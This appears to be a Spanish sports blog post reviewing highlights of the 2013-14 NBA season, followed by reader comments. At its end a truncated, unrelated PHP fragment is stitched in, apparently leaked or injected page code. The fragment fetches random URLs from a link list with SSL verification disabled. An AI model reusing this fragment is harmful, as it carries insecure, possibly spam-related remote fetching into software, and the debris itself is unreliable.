Reflexiones sobre la bocina #16

29 de October de 2014 por MagicJohnson32

¿Recuerda, querido lector, aquellos tiempos pretéritos en los que LeBron James no ingresaba el máximo salarial, Dick Bavetta seguía en activo y Durant, George y Beal estaban mucho más sanos que Kobe Bryant? Hablamos, por si no lo había adivinado, de la temporada 2013-2014. Desde su conclusión han sucedido tantas cosas, y de tal trascendencia, que nos resulta extremadamente lejana. Por ello, para que perduren los borrosos recuerdos que todavía conservamos, y porque más vale ridículamente tarde que tristemente nunca, retornan las Reflexiones Sobre la Bocina especial fin de curso.

Reflexiones

Se trata de la tercera edición de nuestro particular recopilatorio de sucesos más destacados de cada temporada NBA después de los celebradísimos artículos de 2012 y 2013, los cuales fueron galardonados en la prestigiosa categoría “Artículos cuyo autor, por alguna razón, se empeña en escribir pese a que nadie se lo pide”.

Así que, aquí y ahora, coincidiendo con el inicio de la regular season 2014-2015 de la NBA, veamos qué recordaremos dentro de muchos años de la pasada campaña:

#10.- New Orleans Charlotte Pelicans Bobcats Hornets

Finísimo trabajo de rediseño del nuevo logo de Charlotte

Y mi madre pensaba que aquel cursillo de photoshop no me serviría de nada… Fino, fino.

Sucesión de los acontecimientos [con el fin de mejorar la experiencia, se recomienda leer el siguiente párrafo acompañado de la sintonía de la serie de televisión “Enredo”]: en 1988, mediante un draft de expansión, nacieron los Charlotte Hornets. 24 años después, en 2002, la franquicia se trasladó a New Orleans. Después de tres temporadas, el Katrina obligó a reubicar el equipo provisionalmente en Oklahoma (por aquel entonces los Thunder aún eran los Sonics y habitaban en Seattle) bajo el nombre de New Orleans/Oklahoma City Hornets. Por aquel entonces (2004), ya se había creado una nueva franquicia en Charlotte bautizada como los Bobcats. Hasta la 2007-2008 no pudieron los Hornets dejar Oklahoma y regresar a New Orleans, lo que permitió a Clay Bennett llevarse los Sonics a OKC y llamarlos Thunder. Por su parte, los Hornets aún permanecen en New Orleans aunque en realidad no, porque desde hace un año ya no se llaman Hornets sino Pelicans, un cambio que Charlotte ha aprovechado para recuperar el nombre del equipo que allí había residido entre 1988 y 2002. Si el lector ha sido capaz de entender la explicación que nos lleva hasta este punto, en primer lugar mi más sincera enhorabuena y, a continuación, deberes para el fin de semana: ¿a qué franquicia corresponde la historia (resultados, balance, premios, etc.) del período 1988-2002 de los Hornets?

En definitiva, la pasada temporada fue la última que vio a Charlotte bajo el infausto nombre de Bobcats. Vuelven -y ya era hora- los Charlotte Hornets, y consigo nos traen recuerdos de buenos equipos y grandes jugadores como Zo Mourning, Larry Johnson, Glenn Rice, Eddie Jones, Muggsy Bogues, Vlade Divac o Anthony Goldwire.

#9.- Pacers

pacers-comic

La campaña 2013-2014 fue para Indiana Pacers un trayecto en montaña rusa. Empezó con un aparentemente inacabable ascenso, un tramo inicial de regular season en el que merecieron la consideración de favoritos del Este y candidatos al anillo, seguido de un frenazo en su evolución que dio paso a una rápida caída con un ambiente enrarecido en la plantilla y rumores de toda índole (la caída, con la marcha de Stephenson y la gravísima lesión de George, parece no encontrar fin). Hay quien explica lo ocurrido desde argumentos estrictamente deportivos. Otros especulan con triángulos que nada tienen que ver con los ideados por Tex Winter y Phil Jackson. TJNBA, en su compromiso la verdad, ha investigado el caso de los Pacers y está en condiciones de ofrecer la siguiente exclusiva: no tenemos ni puñetera idea de qué ha pasado en Indiana. Fin de la exlusiva.

#8.- NY is the new LA

Para que los Knicks encontrasen su nueva identidad, una llena de promesas, triángulos y Zen, únicamente hizo falta una cosa: que los Lakers renunciasen a la suya. Si los aficionados de la franquicia californiana ya necesitaron mucho Almax para digerir que se optase por Mike D’Antoni en lugar de Phil Jackson tras el despido de Mike Brown, tan duro e incompresible les resulta asistir al retorno del Zen Master de su retiro para ponerse al frente de los NY Knicks en condición de presidente. Con Jackson a las riendas, los Knicks reclutaron de inmediato a otros dos mitos de los Lakers, Derek Fisher y Kurt Rambis, como head coach y asistente, con la misión de implementar el tan añorado por el Staples triángulo ofensivo. Solo les faltó traspasar a Melo y Spike Lee a los Lakers a cambio de Kobe y Jack Nicholson para que la metamorfosis fuese completa, pero no todo iba a resultar tan sencillo para los Knicks en su intento por convertirse en una franquicia ganadora. Han renovado a Anthony y esperan (desean, ansían) la finalización de los contratos de Amaré y Bargnani para dar cuerpo y sustancia a su nuevo y ambicioso proyecto. Yo, personalmente, voy a echar de menos los tiempos en los que Isiah Thomas era el GM y convirtió a los Knicks en una colección de ala-pívots sobrepagados. Ah, the good old times!

lakers-foto-sello

#7.- Lakers: zona cero

Y, a todo esto… ¿qué decir los Lakers? La 2013-2014 vio a los peores Lakers de la historia, un equipo inmerso en un fin de ciclo llevado al pie de la letra, punto sin retorno al que se ha llegado por una serie de catastróficas desdichas de las que hay quien se afana a culpar a Bryant, como si él fuese el propietario, el general manager, el que despreció a Phil Jackson y el que vetó el traspaso de Chris Paul. Kobe es una figura referencial en la franquicia, en la ciudad y en la liga, por supuesto, pero si tuviese la mitad del poder de decisión que le atribuye ESPN, los Lakers jamás habrían traspasado a Fisher, ni habrían optado por Mike D’Antoni, ni habrían tenido a Pau Gasol en el mercado durante años. Bryant no es más ni menos que una pieza (cara y oxidada, pero solo una pieza) de la disfuncional maquinaria en que se ha convertido la franquicia angelina, y en todo caso es el único rastro de grandeza que queda en estos desteñidos Lakers. Sin él, y bien que lo pudimos comprobar la pasada campaña, el ADN ganador que siempre ha caracterizado a la franquicia apenas lo intuiríamos en los estandartes que cuelgan del Staples.

#6.- The Stern Legacy
stern-comic

No sé a vosotros, pero cuando leo, escucho o pronuncio la palabra “comisionado”, de manera mecánica, como un reflejo pavloviano, me sale “Stern”. Son muchos años, décadas, toda nuestra vida como aficionados, con David Stern como figura no solo inamovible sino, ante todo, imprescindible para entender el crecimiento de la NBA, su conversión en el gigantesco espectáculo global que es hoy. Stern no lo ha logrado por sí solo, por supuesto. Llegó al cargo de comisionado en 1984 (repito: 1984, hace 30 años), cuando Magic Johnson y Larry Bird ya dominaban una liga a la que justo entonces se sumaban novatos como Olajuwon, Barkley o Michael Jordan. De la mano de la rivalidad Magic/Lakers vs Bird/Celtics, Stern empezó a moldear una NBA muy diferente, mucho más consciente de su potencial para llegar a un público masivo a través de jugadores cuya influencia traspasó lo estrictamente deportivo. Este fenómeno, incipiente en la década de los 80, encontró su nuevo y definitivo paradigma con Michael Jordan en los 90. Todo ello no habría sido posible sin el talento de Johnson, Bird, Jordan y compañía, pero tampoco sin la visión de Stern, que intuyó lo que podía llegar a ser la NBA y lo ha convertido en realidad. En esta misma sección se ha criticado duramente a David Stern por su intervencionismo excesivo. No se trata de olvidar aquellos reproches, tan vigentes hoy como en el momento en que se realizaron, sino de hacer balance y agradecer a Stern su incuestionable aportación desde los despachos para que disfrutemos cada vez más de lo que sucede sobre el parquet.

#5.- El misterio KD

No ganó el anillo. Ni siquiera alcanzó las Finales. Pero el jugador del año e indiscutible MVP 2014 fue Kevin Durant. A KD le falta ya únicamente el título de la NBA para adornar adecuadamente el altar al que su juego lo ha elevado. El despligue que hace a diario Durant sobre el parquet tiene algo -mucho- de milagro, de prodigio. Es esa clase de suceso que desafía a la razón, que no atiende a la lógica, algo más propio de haber sido atestiguado por un pastor de la Alpujarra en una noche de luna llena y ser objeto de un monográfico de Iker Jiménez.

Cuarto Milenio

– “Hoy en Cuarto Milenio, Kevin Durant: el MVP de la curva”

#4.- NB…As!

Que levante la mano todo aquel al que le ardan las entrañas cada vez que intenta acceder a nba.com y se ve redirigido a la web de As. Sí, me temo que somos legión. ¿Por qué? Me parece fabuloso que Prysa acuerde con la NBA que As se convierta en la web de la NBA en España, pero ¿por qué, si me apetece visitar NBA.com, me lo impiden? Si quiero visitar As.com ya iré yo solito a As.com, dicho todo esto desde el mayor de los respetos para este medio. Aunque, parafraseando aquella brillante aseveración de Charles Barkley sobre Charlie Ward y Chris Childs, lo mejor de la cobertura NBA de As.com es que no es la del marca.com.

#3.- The Big Split (La gran separación)

heat-comic

2014 no será recordado en Miami como un gran año. Lo que peor sabor de boca dejó no fue la apabullante derrota sufrida ante los Spurs en las Finales; ni siquiera fue el aspecto de Justin Bieber como celebrity fan en la primera fila del American Airlines Arena. No, si algo marcó en negativo la temporada de los Heat fue la marcha de LeBron James y la caída del telón para una etapa, la del ‘Big Three’, saldada con dos anillos y otras dos presencias en la serie por el título. No temáis, fans de los Heat, ante la perspectiva de una larga y sufrida transición, porque no la habrá, ya que Pat Riley ha ingeniado una plantilla que, sin duda alguna, figurará entre las mejores de la conferencia. Temed, eso sí, que en 2018 Chris Bosh estará cobrando 27 millones de dólares con 35 años. Y compadeceos de Dwyane Wade. El hombre, que en su momento renunció a cobrar el máximo para que pudiesen llegar LeBron y Bosh, ejerció este verano la cláusula para rescindir los últimos dos años de contrato, que le habrían supuesto 40 millones, de manera que Riley pudiese ofrecer el máximo a James y renegociar la continuidad del Big Three. Wade se quedó sin sus 40 millones y sin LeBron, y finalmente firmó por cerca de 31 millones y vio como el contrato por el máximo se lo llevó Bosh. Cruel. Y, sí, de acuerdo que Wade se columpió de mala manera la pasada temporada, que se perdió 28 partidos, 15 partidos por lesión y otros 13 por descanso, y que tiene 32 años pero por momentos ha aparentado 76; de acuerdo que quedó señalado por su actuación en las Finales, que el descenso en su productividad ofensiva -apenas 15 puntos y 2 asistencias de media- fue nada en comparación con su sonrojante actitud y esfuerzo defensivo… Prometo que cuando empecé la frase anterior planeaba poner un ‘pero’ en algún momento y excusar de alguna manera las paupérrimas Finales de Wade, sin embargo he vuelto a ver este vídeo y, sinceramente, no hay excusa posible.

#2.- “Oh, cielos ¿Donald Sterling es racista? Nooooooooooo…”

Reconocámosle el mérito a Donald Sterling. Ha logrado algo tan difícil como que le echen de la franquicia de la que era dueño justo cuando, tras décadas de penurias y miserias (Sterling se hizo con los Clippers en 1981 y hasta 2006 no ganó una sola eliminatoria de Playoffs), se asentaba como una de las potencias del Oeste. Bravo. El racismo de Sterling era algo por todos conocido y ya denunciado previamente por jugadores y algún directivo, pero hasta que no ha habido una grabación y un medio de gran alcance le ha dado la máxima difusión, la NBA no movió un dedo al respecto. Ya se sabe: no hay nada como un buen escándalo para despertar conciencias. A raíz de la grabación publicada por TMZ, la NBA arrebató la franquicia a Sterling y, finalmente, logró que un jugado autorizase a Shelly Sterling a vender los Clippers a Steve Ballmer. El que fuera CEO de Microsoft interrumpió la que venía siendo su ocupación principal los últimos meses (contar billetes de 100$) y desembolsó 2.000 millones de dólares para convertirse en el nuevo propietario de LAC y pulir de esta manera una de las aristas más afiladas que mantenía la NBA en su tránsito hacia la modernidad.

KKK

“The Sterlings”

#1.- The Beautiful Spurs

Hubo un tiempo en el que veíamos a Gregg Popovich con recelos. Era aquel tipo antipático y maquiavélico, buen técnico sin duda pero que parecía vincular el triunfo a la renuncia a cualquier atisbo de buen baloncesto -al menos entendido desde una perspectiva estética. La figura de Tim Duncan, siempre prudente y discreto, agudizaba aún más los rasgos de Popovich, elevados a niveles caricaturescos por la insistencia de Andrés Montes (remember “Cicuta Mix”). Sobre el papel, el binomio Duncan-Popo podría parecer contra natura, pero el tiempo y los resultados han ofrecido pruebas más que concluyentes de lo opuesto. Popovich ha servido de yang para el yin de Duncan, y así, en sociedad, han encontrado ambos sus respectivas mejores versiones hasta la culminación que supusieron las Finales 2014. Llamadlo “The beautiful game”, llamadlo “The Sons of Spacing”, lo que los Spurs nos entregaron a lo largo de todo el año pero, especialmente, en la cita por el título, fue la sublimación de este bendito deporte.

Comenta

10 comentarios a esta entrada

  1. Azabel dice:
    #1

    wow, gran victoria de los pelicans con su trio interior a pleno (ver mi analisis previo)

    Anthony Davis, 26 puntos, 17 rebotes y 9 tapones

    Asik, 14 puntos, 17 rebotes y 5 tapones

    Anderson 22 puntos y 9 rebotes

    excelente trio que roto todo el partido tanto como se previa, anderson rotando con davis y asik, moviendose estos de 5 en esos momentos y sino davis y asik juntos, me gusta este equipo, dificil que cumpla mis predicciones pero inicia por el buen camino

      Citar

  2. Azabel dice:
    #2

    en cuanto a lo de as.com, en argentina es lo mismo, ya no se puede ingresar de ningun modo al sitio nba.com y te reenvian al nba.ole, donde incluso resulta difil ver los resumenes y los box scores, una verdadera porqueria

      Citar

  3. TheDeerHunter dice:
    #3

    No eres tú Dwayne, soy yo…
    XD XD XD XD

      Citar

  4. txusma dice:
    #4

    Tremendísimo una vez más Magic. Me he reído mucho con el artículo desde la primera pero a la vez he recordado realmente lo que más valía la pena de la temporada pasada. Divertido e instructivo, como debería ser el cole.

      Citar

  5. Denise dice:
    #5

    A mi me molaban los Bobcats y ahora me jode que se confunda y se relacione estos Charlotte Hornets con los de la decada de los 80, puesto que no son la misma franquicia.

      Citar

  6. Pop dice:
    #6

    Grandísmo Magic una vez más, Vaya perlas.

    Azabel/Esteban, yo entro con el siguiente enlace:

    http://www.nba.com/?country=us

      Citar

  7. Ruxixon dice:
    #7

    Mira que se echa en falta mayor frecuencia de estos artículos,pero que leches,cuanto mayor es la espera mayor es el disfrute xD

    Todos sabemos que el cambio de nombre de los New Orleans Charlotte Pelicans Bobcats Hornets obedece a causas publicitarias en la camiseta.

      Citar

  8. rumbero dice:
    #8

    Aplausos una vez más. Desde aquí pido un bonus track con el “vasogate” de Kidd con photoshop incluido

      Citar

  9. MagicJohnson32 dice:
    #9

    rumbero:
    Aplausos una vez más. Desde aquí pido un bonus track con el “vasogate” de Kidd con photoshop incluido

    De hecho se me han quedado fuera varios topics, especialmente la flor de los Cavs y el tankeo épico de los Sixers.

    No descarto una edición deluxe con los descartes, jeje.

      Citar

  10. Antoni Angel dice:
    #10

    MagicJohnson32: De hecho se me han quedado fuera varios topics, especialmente la flor de los Cavs y el tankeo épico de los Sixers.

    No descarto una edición deluxe con los descartes, jeje.

    Pues ya está tardando…;)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>